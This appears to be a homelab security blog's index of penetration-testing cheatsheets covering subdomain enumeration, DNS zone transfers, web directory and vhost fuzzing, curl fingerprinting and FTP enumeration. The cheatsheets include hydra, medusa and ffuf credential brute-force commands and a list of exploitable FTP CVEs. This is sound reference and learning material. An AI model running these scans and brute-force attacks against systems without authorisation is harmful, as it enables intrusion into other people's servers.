Building, breaking, and securing — out loud.

Field notes from a Marine veteran and federal IT pro learning offensive and defensive security in the homelab. Proxmox, Docker Swarm, FreeIPA, Ansible, and whatever I’m tearing apart this week — documented as I go.

amass

amass Cheatsheet Type: Actively maintained subdomain discovery — extensive data sources & tool integrations Installation sudo apt install amass # or go install -v github.com/owasp-amass/amass/v4/...@master # or snap install amass Subcommands Subcommand Description enum Subdomain enumeration (main command) intel Collect intel about an organisation viz Visualise enumeration results track Track differences between enumerations db Interact with the graph database enum — Subdomain Enumeration # Basic passive enumeration amass enum -passive -d example.com # Active enumeration (DNS resolution + brute force) amass enum -active -d example.com # Active with brute force amass enum -brute -d example.com # Brute force with wordlist amass enum -brute -w wordlist.txt -d example.com # Multiple domains amass enum -d example.com -d example.org # Domains from file amass enum -df domains.txt # Limit data sources amass enum -passive -d example.com -src # Output to file amass enum -d example.com -o output.txt # Output to JSON amass enum -d example.com -json output.json # Show data sources in results amass enum -d example.com -src # Verbose amass enum -v -d example.com # Set timeout (minutes) amass enum -d example.com -timeout 30 # Use specific resolvers amass enum -d example.com -r 8.8.8.8,1.1.1.1 # Use resolver list amass enum -d example.com -rf resolvers.txt # Exclude data sources amass enum -d example.com -exclude CrtSearch # Only specific data sources amass enum -d example.com -include Wayback,CrtSearch Common Flags (enum) Flag Description -d <domain> Target domain -df <file> File with list of domains -passive Passive only (no DNS resolution) -active Active DNS (zone transfer, cert grabbing) -brute Enable brute force -w <wordlist> Wordlist for brute force -o <file> Output results to file -json <file> Output as JSON -src Show data source for each result -ip Show IP addresses -r <resolvers> Comma-separated resolver IPs -rf <file> File of resolver IPs -timeout <n> Timeout in minutes -v Verbose -config <file> Config file path -dir <path> Directory for output/database intel — Org Recon # Find domains by organisation name amass intel -org "Target Corp" # Reverse whois amass intel -whois -d example.com # ASN lookup amass intel -asn 12345 # Find domains from IP/CIDR amass intel -ip 192.168.1.0/24 # Find ASN from domain amass intel -d example.com -whois Configuration File Config file at ~/.config/amass/config.ini (or specify with -config): ...

3 min · d3vilsec

assetfinder

assetfinder Cheatsheet Type: Simple, lightweight subdomain finder using multiple passive data sources — ideal for quick recon Installation go install github.com/tomnomnom/assetfinder@latest # Binary ends up in ~/go/bin/assetfinder # Or download pre-built binary wget https://github.com/tomnomnom/assetfinder/releases/latest/download/assetfinder-linux-amd64.tgz tar xf assetfinder-linux-amd64.tgz mv assetfinder /usr/local/bin/ Basic Usage assetfinder <domain> assetfinder example.com Flags Flag Description --subs-only Show only subdomains (filter out related domains / TLD variants) Common Commands # All results (subdomains + related domains) assetfinder example.com # Subdomains only (most common usage) assetfinder --subs-only example.com # Save to file assetfinder --subs-only example.com > subdomains.txt # Multiple domains from stdin cat domains.txt | xargs -I{} assetfinder --subs-only {} # Pipe into other tools assetfinder --subs-only example.com | httprobe # Check live hosts assetfinder --subs-only example.com | sort -u # Deduplicate Data Sources Used crt.sh (Certificate transparency logs) certspotter (SSL cert monitoring) hackertarget (Passive DNS) threatcrowd (Threat intelligence) wayback (Wayback Machine / archive.org) dnsdumpster (DNS recon service) facebook CT (Facebook certificate transparency) virustotal (Passive DNS) findsubdomains.com Pipeline Examples # Find subdomains → probe for live web servers → save assetfinder --subs-only example.com | httprobe | tee live_hosts.txt # Find subdomains → resolve to IPs assetfinder --subs-only example.com | \ xargs -I{} dig +short {} | grep -v "^$" | sort -u # Find subdomains → run nmap on live ones assetfinder --subs-only example.com | \ httprobe | sed 's/https\?:\/\///' | \ xargs -I{} nmap -p 80,443 {} # Combine with other tools for coverage (assetfinder --subs-only example.com; \ subfinder -d example.com -silent; \ amass enum -passive -d example.com) | sort -u > all_subs.txt Notes Passive only — does not brute force DNS or make queries to the target Fast and lightweight — great first pass before heavier tools No API keys needed for most sources (some may be rate-limited) Output may contain duplicates — always pipe through sort -u

2 min · d3vilsec

builtwith

BuiltWith Cheatsheet Purpose: Passive technology profiling of a domain — current stack plus historical changes, hosting, analytics, ad networks, ecommerce, CDN, certificates, and more. Useful for OSINT recon without touching the target. Format: Web service (free tier + paid API). No local install required for basic lookups. Access Points Surface URL Profile lookup (single domain) https://builtwith.com/ Free quick lookup https://builtwith.com/? Trends / market share https://trends.builtwith.com/ Relationships (same owner / IDs) https://builtwith.com/relationships/ Redirect graph https://builtwith.com/redirect/ API docs (paid) https://api.builtwith.com/ Browser extension (Chrome/Firefox) search “BuiltWith Technology Profiler” in store Quick CLI Lookups (no API key required) # Open profile in default browser xdg-open "https://builtwith.com/target.tld" # Scrape the public profile page (limited; HTML changes) curl -s -A "Mozilla/5.0" "https://builtwith.com/target.tld" -o builtwith.html # Extract technology names (rough) curl -s -A "Mozilla/5.0" "https://builtwith.com/target.tld" \ | grep -oE 'href="/[a-z0-9-]+"[^>]*>[^<]+' | sort -u For reliable structured data, use the paid API below. ...

3 min · d3vilsec

curl

curl Cheatsheet (Web Fingerprinting) Purpose: Manual HTTP(S) requests for header inspection, banner grabbing, fingerprinting and quick endpoint testing. Core Flags Flag Description -I HEAD request (headers only) -i Include response headers in output -v Verbose (request + response, TLS info) -vv / --trace-ascii - Full wire trace -s Silent (no progress meter) -S Show errors even with -s -L Follow redirects -k / --insecure Ignore TLS cert errors -o <file> Write body to file -O Save with remote filename -A <ua> Set User-Agent -e <ref> Set Referer -H "<hdr>: <val>" Custom header (repeatable) -X <METHOD> HTTP method (GET, POST, PUT, DELETE, etc.) -d <data> POST body (application/x-www-form-urlencoded) --data-raw POST body without @/& interpretation --data-binary POST body as-is (preserve newlines) -F <field>=<val> Multipart form upload -b <cookie> / -c <file> Send cookie / save cookies -u user:pass HTTP Basic auth -x <proxy> Use proxy (e.g. http://127.0.0.1:8080) --resolve host:port:ip Force DNS resolution (Host-header testing) --max-time <s> Hard timeout --connect-timeout <s> Connect timeout -w "<format>" Write-out format (timings, codes) Banner Grabbing / Header Inspection curl -I https://target.tld # HEAD: server, framework, cookies curl -sI https://target.tld | grep -iE 'server|x-powered-by|x-aspnet|via|set-cookie' curl -sIL https://target.tld # Follow redirects, show every hop curl -v https://target.tld 2>&1 | grep -iE '^< ' # All response headers Verbose / TLS Inspection curl -v https://target.tld # Cert chain, ALPN, ciphers curl -vk https://target.tld # Ignore cert errors curl --trace-ascii trace.log https://target.tld # Full request/response dump curl -v --tls-max 1.2 https://target.tld # Pin max TLS version Method / Verb Tampering curl -X OPTIONS -i https://target.tld/ # Allowed methods curl -X PUT -d "test" -i https://target.tld/file.txt curl -X DELETE -i https://target.tld/resource/1 curl -X TRACE -i https://target.tld/ # Cross-Site Tracing check Virtual Host / Host Header Testing curl -s -H "Host: dev.target.tld" http://<ip>/ -o dev.html curl -sI --resolve target.tld:443:<ip> https://target.tld/ curl -s -H "Host: admin.internal" http://<ip>/ # Find vhosts on shared IP Cookies & Sessions curl -c cookies.txt -b cookies.txt https://target.tld/login curl -b "session=abcd1234" https://target.tld/dashboard curl -c - https://target.tld/ # Print Set-Cookie to stdout Authentication curl -u admin:password https://target.tld/admin # Basic curl -H "Authorization: Bearer <jwt>" https://api.target.tld/ curl --ntlm -u 'DOMAIN\user:pass' https://target.tld/ curl --digest -u user:pass https://target.tld/ POST / API Testing # Form data curl -X POST -d "user=admin&pass=admin" https://target.tld/login # Raw JSON curl -X POST -H "Content-Type: application/json" \ -d '{"user":"admin","pass":"admin"}' \ https://target.tld/api/login # File from disk curl -X POST -H "Content-Type: application/json" \ --data-binary @payload.json https://target.tld/api # Multipart upload curl -F "[email protected]" -F "submit=upload" https://target.tld/upload.php Proxy (Burp / ZAP) curl -x http://127.0.0.1:8080 -k https://target.tld/ export https_proxy=http://127.0.0.1:8080 # Per-shell proxy Useful Write-Out Format curl -s -o /dev/null -w \ "code:%{http_code} size:%{size_download} time:%{time_total}s redir:%{redirect_url} " \ https://target.tld/ Fingerprinting Recipes # Quick stack identification curl -sIL https://target.tld | grep -iE 'server|x-powered-by|x-generator|x-drupal|x-aspnet' # Pull robots.txt + sitemap curl -s https://target.tld/robots.txt curl -s https://target.tld/sitemap.xml | head # Search response body for tech tells curl -s https://target.tld/ | grep -iE 'wp-content|drupal|joomla|laravel|generator=' # Check common admin / framework paths for p in admin login wp-admin administrator phpmyadmin server-status; do printf "%-20s " "$p" curl -sk -o /dev/null -w "%{http_code} " "https://target.tld/$p" done Tips HEAD (-I) can lie or be blocked — fall back to -sI -X GET and inspect headers from a real GET. Combine -v with -o /dev/null to inspect headers without dumping a big body. --resolve beats editing /etc/hosts for one-off vhost checks. -k is for testing only; never disable cert checks in production tooling.

3 min · d3vilsec

DNS

DNS Enumeration Cheatsheet Default Port: 53 (TCP/UDP) Key DNS Record Types Record Description A IPv4 address AAAA IPv6 address MX Mail server NS Name server TXT Text records (SPF, DMARC, verification) CNAME Canonical name / alias SOA Start of authority PTR Reverse lookup SRV Service location Basic Lookups # host host <domain> host -t A <domain> host -t MX <domain> host -t NS <domain> host -t TXT <domain> host -t CNAME <domain> # dig dig <domain> dig <domain> ANY dig <domain> A dig <domain> MX dig <domain> NS dig <domain> TXT dig @<nameserver> <domain> ANY +noall +answer # nslookup nslookup <domain> nslookup -type=MX <domain> nslookup -type=NS <domain> Zone Transfer dig axfr @<nameserver> <domain> host -l <domain> <nameserver> fierce --domain <domain> Subdomain Enumeration # dnsenum dnsenum --dnsserver <ns> --enum -p 0 -s 0 -o output.txt -f wordlist.txt <domain> dnsenum --enum inlanefreight.htb -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -r # dnsrecon dnsrecon -d <domain> -t std # Standard enumeration dnsrecon -d <domain> -t axfr # Zone transfer attempt dnsrecon -d <domain> -t brt -D wordlist.txt # Brute force subdomains # gobuster DNS mode gobuster dns -d <domain> -w wordlist.txt -r <nameserver> # Sublist3r sublist3r -d <domain> # Amass amass enum -d <domain> amass enum -passive -d <domain> Nmap DNS Scripts nmap -p 53 --script dns-brute <domain> nmap -p 53 --script dns-zone-transfer \ --script-args dns-zone-transfer.domain=<domain> <nameserver> nmap -p 53 --script dns-nsid <nameserver> nmap -p 53 --script dns-recursion <nameserver> nmap -p 53 --script dns-cache-snoop <nameserver> Reverse DNS Lookup dig -x <ip> host <ip> dnsrecon -r <cidr> -t rvl # Example dig -x 192.168.1.1 host 192.168.1.1 Wordlists (SecLists) /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt

2 min · d3vilsec

dnsenum

dnsenum Cheatsheet Type: Comprehensive DNS enumeration — dictionary & brute-force subdomain discovery Installation sudo apt install dnsenum # or git clone https://github.com/fwaeytens/dnsenum.git Basic Usage dnsenum <domain> dnsenum example.com Common Flags Flag Description --dnsserver <ns> Use a specific DNS server -f <wordlist> Wordlist for subdomain brute force -r Enable recursive brute force on found subdomains -p <pages> Number of Google scraping pages (default: 5) -s <results> Maximum results from Google scraping -o <file> Output to XML file --enum Shortcut: enables brute force, threads, Google scraping --threads <n> Number of threads for brute forcing --noreverse Skip reverse lookup on found IP ranges --nocolor Disable colored output -v Verbose output --timeout <s> DNS query timeout in seconds Common Commands # Full enumeration with brute force dnsenum --dnsserver <ns> --enum -p 0 -s 0 -f wordlist.txt <domain> # Brute force with threads, no Google scraping dnsenum -f wordlist.txt --threads 20 --noreverse <domain> # Output to XML dnsenum -f wordlist.txt -o output.xml <domain> # Recursive brute force (enumerate found subdomains too) dnsenum -f wordlist.txt -r <domain> # Suppress Google scraping (clean/offline) dnsenum -p 0 -s 0 -f wordlist.txt <domain> # Use specific nameserver dnsenum --dnsserver 8.8.8.8 -f wordlist.txt <domain> What dnsenum Does Automatically 1. Queries A, NS, MX records 2. Attempts zone transfer (AXFR) on each nameserver 3. Google scraping for subdomains (unless -p 0 -s 0) 4. Reverse lookups on found IP ranges 5. Brute forces subdomains from wordlist (if -f provided) Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt /usr/share/wordlists/dnsmap.txt Example Full Run dnsenum --dnsserver 8.8.8.8 \ --enum \ -p 0 -s 0 \ --threads 20 \ -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -o results.xml \ example.com

2 min · d3vilsec

dnsrecon

dnsrecon Cheatsheet Type: Versatile DNS reconnaissance — multiple techniques, customisable output formats Installation sudo apt install dnsrecon # or git clone https://github.com/darkoperator/dnsrecon.git pip3 install -r requirements.txt Basic Usage dnsrecon -d <domain> dnsrecon -d example.com Scan Types (-t) Type Description std Standard — A, AAAA, NS, SOA, MX, TXT records axfr Zone transfer attempt on all nameservers brt Brute force subdomains from wordlist rvl Reverse lookup on IP range goo Google scraping for subdomains snoop Cache snooping on nameservers tld Check all TLD variations of domain zonewalk DNSSEC zone walking (NSEC enumeration) srv SRV record enumeration bing Bing scraping for subdomains crt Certificate transparency logs Common Flags Flag Description -d <domain> Target domain -t <type> Scan type (see table above) -D <wordlist> Wordlist for brute force (brt) -n <nameserver> Use specific nameserver -r <cidr> IP range for reverse lookups -c <file> Save output to CSV -j <file> Save output to JSON -x <file> Save output to XML --db <file> Save output to SQLite DB -f Filter wildcard results -a Perform AXFR on all nameservers --iw Continue brute force even if wildcard detected -v Verbose output --lifetime <s> Query lifetime in seconds --tcp Use TCP for queries -t std,brt Combine multiple scan types Common Commands # Standard enumeration (all record types) dnsrecon -d example.com -t std # Zone transfer attempt dnsrecon -d example.com -t axfr # Brute force subdomains dnsrecon -d example.com -t brt -D wordlist.txt # Reverse lookup on a range dnsrecon -r 192.168.1.0/24 -t rvl # Cache snooping dnsrecon -t snoop -n <nameserver> -D wordlist.txt # DNSSEC zone walking dnsrecon -d example.com -t zonewalk # Certificate transparency dnsrecon -d example.com -t crt # Multiple scan types at once dnsrecon -d example.com -t std,axfr,brt -D wordlist.txt # Use specific nameserver dnsrecon -d example.com -n 8.8.8.8 -t std # Output to JSON dnsrecon -d example.com -t std -j output.json # Output to CSV dnsrecon -d example.com -t brt -D wordlist.txt -c output.csv # Filter wildcards during brute force dnsrecon -d example.com -t brt -D wordlist.txt -f # Force brute force through wildcard dnsrecon -d example.com -t brt -D wordlist.txt --iw Recommended Wordlists /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Run dnsrecon -d example.com \ -t std,axfr,brt \ -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -n 8.8.8.8 \ -f \ -j dnsrecon_results.json

2 min · d3vilsec

feroxbuster

feroxbuster Cheatsheet Type: Fast Rust-based web fuzzer — recursive directory brute forcing, wildcard detection, rich filtering Installation sudo apt install feroxbuster # or curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash # or cargo install feroxbuster Basic Usage feroxbuster -u http://<ip> feroxbuster -u http://<ip> -w wordlist.txt Common Flags Flag Description -u <url> Target URL -w <wordlist> Wordlist (default: built-in if not specified) -t <n> Threads (default: 50) -x <ext> File extensions to append -d <n> Recursion depth (default: 4, 0 = unlimited) -r Follow redirects -k Disable TLS certificate verification -n Disable recursion -C <codes> Filter out status codes -s <codes> Only show these status codes -S <size> Filter by response size (bytes) -W <words> Filter by word count in response -L <lines> Filter by line count in response -X <regex> Filter by response body regex -H <header> Add custom header (repeatable) -b <cookie> Add cookie -m <methods> HTTP methods (default: GET) -o <file> Output to file -q Quiet — no banner or progress --json Output as JSON -v Verbose -T <seconds> Request timeout --rate-limit <n> Max requests per second -p <proxy> Use proxy (http/socks5) -U <user> -P <pass> HTTP Basic auth -a <agent> User-Agent string --dont-filter Disable wildcard filtering --auto-tune Automatically slow down on errors --collect-extensions Collect and scan discovered extensions --collect-words Build wordlist from responses --resume-from <file> Resume from a saved state file Common Commands # Basic scan with extensions feroxbuster -u http://<ip> -w wordlist.txt -x php,html,txt # No recursion (flat scan) feroxbuster -u http://<ip> -w wordlist.txt -n # Limit recursion depth feroxbuster -u http://<ip> -w wordlist.txt -d 2 # Filter out 404s and 403s feroxbuster -u http://<ip> -w wordlist.txt -C 404,403 # Only show 200 and 301 feroxbuster -u http://<ip> -w wordlist.txt -s 200,301 # Filter responses by size (remove default page noise) feroxbuster -u http://<ip> -w wordlist.txt -S 1234 # Filter by word count feroxbuster -u http://<ip> -w wordlist.txt -W 25 # HTTPS with TLS skip feroxbuster -u https://<ip> -w wordlist.txt -k # Custom headers (e.g. API auth) feroxbuster -u http://<ip> -w wordlist.txt \ -H "Authorization: Bearer <token>" \ -H "X-Custom: value" # Use proxy (Burp Suite) feroxbuster -u http://<ip> -w wordlist.txt \ -p http://127.0.0.1:8080 -k # POST requests feroxbuster -u http://<ip> -w wordlist.txt -m POST # Multiple HTTP methods feroxbuster -u http://<ip> -w wordlist.txt -m GET,POST,PUT # Output to file (also saves state for resume) feroxbuster -u http://<ip> -w wordlist.txt -o results.txt # JSON output feroxbuster -u http://<ip> -w wordlist.txt --json -o results.json # Resume interrupted scan feroxbuster --resume-from ferox-<ip>.state # Rate limit (be polite / evade detection) feroxbuster -u http://<ip> -w wordlist.txt --rate-limit 100 # Collect extensions seen in responses and scan them too feroxbuster -u http://<ip> -w wordlist.txt --collect-extensions # Build a wordlist from page content, then use it feroxbuster -u http://<ip> -w wordlist.txt --collect-words Virtual Host Discovery # feroxbuster doesn't natively fuzz Host headers # Use with -H to manually set a specific host header, # or use ffuf/gobuster for vhost fuzzing feroxbuster -u http://<ip> -w wordlist.txt \ -H "Host: staging.example.com" Interactive Pause Menu While feroxbuster is running, press ENTER to open the interactive menu: ...

3 min · d3vilsec

ffuf

ffuf Cheatsheet Type: Fast web fuzzer — directory busting, virtual host discovery, parameter fuzzing, Host header fuzzing Installation sudo apt install ffuf # or go install github.com/ffuf/ffuf/v2@latest Core Concept FUZZ is the keyword replaced by each wordlist entry. It can go anywhere in the request — URL path, headers, parameters, body. ffuf -u http://<ip>/FUZZ -w wordlist.txt Multiple keywords are supported by naming them with -w wordlist:KEYWORD: ffuf -u http://<ip>/FUZZ -w wordlist1.txt -w params.txt:PARAM Common Flags Flag Description -u <url> Target URL (include FUZZ) -w <wordlist> Wordlist (use wordlist:KEYWORD for named) -H <header> Add/fuzz header (repeatable) -X <method> HTTP method (default: GET) -d <data> POST data body -b <cookie> Cookie string -r Follow redirects -k Skip TLS verification -t <n> Threads (default: 40) -p <delay> Delay between requests (e.g. 0.1, 0.5-1.5) -rate <n> Max requests per second -timeout <n> Request timeout in seconds -mc <codes> Match status codes (default: 200-299,301,302,307,401,403,405,500) -ms <size> Match response size -mw <words> Match word count -ml <lines> Match line count -mr <regex> Match regex in response body -fc <codes> Filter status codes -fs <size> Filter response size -fw <words> Filter word count -fl <lines> Filter line count -fr <regex> Filter regex in response body -ac Auto-calibrate filters (detects and removes false positives) -o <file> Output file -of <fmt> Output format: json, ejson, html, md, csv, all -v Verbose (show redirects, full URL) -s Silent — only results -c Colorize output -recursion Enable recursive fuzzing -recursion-depth <n> Recursion depth -e <exts> File extensions (e.g. php,html,txt) -ic Ignore wordlist comments -input-cmd <cmd> Use command output as input instead of wordlist Directory & File Fuzzing # Basic directory scan ffuf -u http://<ip>/FUZZ -w wordlist.txt # With file extensions ffuf -u http://<ip>/FUZZ -w wordlist.txt -e .php,.html,.txt,.bak # Filter 404s ffuf -u http://<ip>/FUZZ -w wordlist.txt -fc 404 # Match only 200 ffuf -u http://<ip>/FUZZ -w wordlist.txt -mc 200 # Auto-calibrate (removes false positives automatically) ffuf -u http://<ip>/FUZZ -w wordlist.txt -ac # Recursive scanning ffuf -u http://<ip>/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -e .php # Filter by response size (remove noise) ffuf -u http://<ip>/FUZZ -w wordlist.txt -fs 4242 Virtual Host Discovery (Host Header Fuzzing) # Basic vhost fuzzing ffuf -u http://<ip> -H "Host: FUZZ.example.com" -w wordlist.txt # Filter default response size ffuf -u http://<ip> -H "Host: FUZZ.example.com" \ -w wordlist.txt \ -fs <default_size> # Auto-calibrate to remove default response ffuf -u http://<ip> -H "Host: FUZZ.example.com" \ -w wordlist.txt \ -ac # HTTPS ffuf -u https://<ip> -H "Host: FUZZ.example.com" \ -w wordlist.txt \ -k -fs <default_size> Parameter Fuzzing # GET parameter discovery ffuf -u "http://<ip>/page?FUZZ=value" -w wordlist.txt -fc 404 # GET parameter value fuzzing ffuf -u "http://<ip>/page?id=FUZZ" -w numbers.txt # POST parameter fuzzing ffuf -u http://<ip>/login \ -X POST \ -d "username=admin&password=FUZZ" \ -w wordlist.txt \ -fc 401 # POST body with JSON ffuf -u http://<ip>/api/login \ -X POST \ -H "Content-Type: application/json" \ -d '{"username":"admin","password":"FUZZ"}' \ -w wordlist.txt Multiple Wordlists (Clusterbomb / Pitchfork) # Two keywords — try all combinations (clusterbomb) ffuf -u http://<ip>/FUZZ/W2 \ -w wordlist.txt:FUZZ \ -w extensions.txt:W2 # Username + password combinations ffuf -u http://<ip>/login \ -X POST \ -d "user=USER&pass=PASS" \ -w users.txt:USER \ -w passwords.txt:PASS \ -fc 401 Fuzzing with Proxy (Burp Suite) ffuf -u http://<ip>/FUZZ -w wordlist.txt \ -x http://127.0.0.1:8080 -k Output # Save to file (markdown) ffuf -u http://<ip>/FUZZ -w wordlist.txt -o results.md -of md # Save as JSON ffuf -u http://<ip>/FUZZ -w wordlist.txt -o results.json -of json # Save all formats ffuf -u http://<ip>/FUZZ -w wordlist.txt -o results -of all Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/common.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt # Parameters /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Passwords /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt Example Full Runs # Directory + extension scan ffuf -u http://example.com/FUZZ \ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \ -e .php,.html,.txt,.bak \ -ac -c -v \ -t 50 \ -o ffuf_dir.json -of json # Virtual host discovery ffuf -u http://example.com \ -H "Host: FUZZ.example.com" \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ -ac -c \ -t 50 \ -o ffuf_vhost.json -of json

4 min · d3vilsec

fierce

fierce Cheatsheet Type: User-friendly recursive subdomain discovery with wildcard detection Installation sudo apt install fierce # or pip3 install fierce # or git clone https://github.com/mschwager/fierce.git Basic Usage fierce --domain <domain> fierce --domain example.com Common Flags Flag Description --domain <domain> Target domain --wordlist <file> Custom wordlist for brute forcing --dns-servers <ns> Use specific DNS servers (space-separated) --delay <seconds> Delay between requests --subdomains <list> Manually specify subdomains to check --wide Scan entire Class C of discovered hosts --traverse <n> Scan IPs n away from discovered hosts --search <domains> Filter results by domain pattern --range <cidr> Scan an IP range for PTR records --connect Attempt HTTP/HTTPS connections to found hosts --output <file> Save results to JSON file Common Commands # Basic scan (uses built-in wordlist) fierce --domain example.com # Custom wordlist fierce --domain example.com \ --wordlist /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # Use specific DNS server fierce --domain example.com --dns-servers 8.8.8.8 # Wide scan (scan Class C of discovered IPs) fierce --domain example.com --wide # Add delay to evade detection fierce --domain example.com --delay 3 # Traverse IPs near discovered hosts fierce --domain example.com --traverse 5 # Check HTTP/HTTPS on found hosts fierce --domain example.com --connect # Save to JSON fierce --domain example.com --output results.json # Scan IP range for reverse DNS fierce --range 192.168.1.0/24 Key Features - Wildcard detection (avoids false positives from wildcard DNS) - Recursive: checks subdomains of subdomains - Identifies adjacent IPs in same IP space - Clean, readable output format - Built-in default wordlist Wildcard Detection Fierce automatically detects wildcard DNS entries. If a domain resolves all queries (e.g., *.example.com → same IP), fierce identifies this and handles it gracefully instead of reporting false positives. ...

2 min · d3vilsec

FTP

FTP Enumeration Cheatsheet Default Ports: 21 (control), 20 (data - active mode) Banner Grabbing & Connection nc -nv <ip> 21 telnet <ip> 21 ftp <ip> openssl s_client -connect <ip>:21 -starttls ftp # FTPS Anonymous Login ftp <ip> # Username: anonymous # Password: anonymous (or leave blank) # Via curl curl -v ftp://<ip>/ --user anonymous:anonymous curl -v ftp://<ip>/<path>/ --user anonymous:anonymous FTP Commands (Once Connected) USER <username> # Send username PASS <password> # Send password SYST # Display system type STAT # Status / verbose file listing LIST # List files (verbose) NLST # Name list (simple) PWD # Print working directory CWD <dir> # Change directory GET <file> # Download file PUT <file> # Upload file MGET * # Download all files BINARY # Switch to binary transfer mode ASCII # Switch to ASCII transfer mode PASV # Enter passive mode QUIT # Disconnect Nmap FTP Scripts nmap -p 21 --script ftp-anon <ip> # Check anonymous login nmap -p 21 --script ftp-banner <ip> # Banner grab nmap -p 21 --script ftp-brute <ip> # Brute force credentials nmap -p 21 --script ftp-bounce <ip> # FTP bounce attack check nmap -p 21 --script ftp-syst <ip> # SYST command response nmap -p 21 --script ftp-vsftpd-backdoor <ip> # vsFTPd 2.3.4 backdoor check nmap -p 21 -sV --script ftp-* <ip> # Run all FTP scripts Brute Force hydra -l <user> -P wordlist.txt ftp://<ip> hydra -L users.txt -P wordlist.txt ftp://<ip> medusa -u <user> -P wordlist.txt -h <ip> -M ftp Bulk Download # wget recursive download (no passive mode) wget -m --no-passive ftp://anonymous:anonymous@<ip> # curl recursive curl -s ftp://<ip>/ --user anonymous:anonymous | awk '{print $NF}' | \ while read f; do curl -s ftp://<ip>/$f --user anonymous:anonymous -O; done Key Vulnerabilities Software CVE Description vsFTPd 2.3.4 CVE-2011-2523 Backdoor shell on port 6200 ProFTPd 1.3.5 CVE-2015-3306 mod_copy unauthenticated file copy ProFTPd 1.3.3c CVE-2010-4221 Remote heap overflow

2 min · d3vilsec

gobuster

gobuster Cheatsheet Type: Multi-purpose brute-forcing tool — directories, files, DNS subdomains, virtual hosts, S3 buckets Installation sudo apt install gobuster # or go install github.com/OJ/gobuster/v3@latest Modes Mode Description dir Directory and file brute forcing dns DNS subdomain brute forcing vhost Virtual host discovery fuzz Fuzzing (replace FUZZ keyword anywhere in URL) s3 AWS S3 bucket enumeration gcs Google Cloud Storage bucket enumeration Global Flags Flag Description -w <wordlist> Wordlist path -t <n> Threads (default: 10) -o <file> Output to file -q Quiet — only print results -v Verbose --no-error Suppress errors -z No progress bar --delay <ms> Delay between requests dir — Directory & File Brute Force # Basic scan gobuster dir -u http://<ip> -w wordlist.txt # Common flags gobuster dir -u http://<ip> -w wordlist.txt \ -t 50 \ # 50 threads -x php,html,txt,bak \ # File extensions -s 200,204,301,302,307 \ # Status codes to show -b 404,403 \ # Status codes to exclude --timeout 10s \ # Request timeout -k \ # Skip TLS verification -c "PHPSESSID=abc123" \ # Cookie -H "Authorization: Bearer tok" \ # Custom header -U <user> -P <pass> \ # HTTP Basic auth -r \ # Follow redirects -e \ # Print full URL -o results.txt # HTTPS target gobuster dir -u https://<ip> -w wordlist.txt -k # Custom User-Agent gobuster dir -u http://<ip> -w wordlist.txt \ -a "Mozilla/5.0" dir Flags Flag Description -u <url> Target URL -x <ext> File extensions (comma-separated) -s <codes> Allowed status codes -b <codes> Blacklisted status codes -r Follow redirects -k Skip TLS certificate verification -c <cookie> Cookie string -H <header> Extra header (repeatable) -U / -P HTTP Basic auth username/password -e Print full URL in output -l Print response length --timeout <dur> Request timeout --wildcard Force continue if wildcard found --exclude-length <n> Exclude responses of this length dns — Subdomain Brute Force # Basic DNS brute force gobuster dns -d <domain> -w wordlist.txt # With specific resolver gobuster dns -d example.com -w wordlist.txt -r 8.8.8.8 # Show IP addresses gobuster dns -d example.com -w wordlist.txt -i # Wildcard override gobuster dns -d example.com -w wordlist.txt --wildcard dns Flags Flag Description -d <domain> Target domain -r <resolver> Custom DNS resolver -i Show IP addresses of found subdomains --wildcard Force scan even if wildcard DNS detected vhost — Virtual Host Discovery # Basic vhost scan gobuster vhost -u http://<ip> -w wordlist.txt # Append domain to wordlist entries gobuster vhost -u http://<ip> -w wordlist.txt \ --append-domain \ --domain example.com # Filter out specific response length (removes default/fallback page) gobuster vhost -u http://<ip> -w wordlist.txt \ --append-domain \ --exclude-length 290 # HTTPS gobuster vhost -u https://<ip> -w wordlist.txt -k --append-domain vhost Flags Flag Description -u <url> Target URL --append-domain Append base domain to each word --domain <domain> Base domain to append --exclude-length <n> Exclude responses of this content length fuzz — Generic Fuzzing # Fuzz a parameter value gobuster fuzz -u "http://<ip>/page.php?id=FUZZ" -w wordlist.txt # Fuzz with status filter gobuster fuzz -u "http://<ip>/FUZZ.php" -w wordlist.txt -b 404 Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt # Files (with extensions) /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt Example Full Runs # Directory + file scan gobuster dir \ -u http://example.com \ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \ -x php,html,txt,bak,zip \ -t 50 -e -l \ -o gobuster_dir.txt # Virtual host discovery gobuster vhost \ -u http://example.com \ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \ --append-domain \ --exclude-length 290 \ -t 50 \ -o 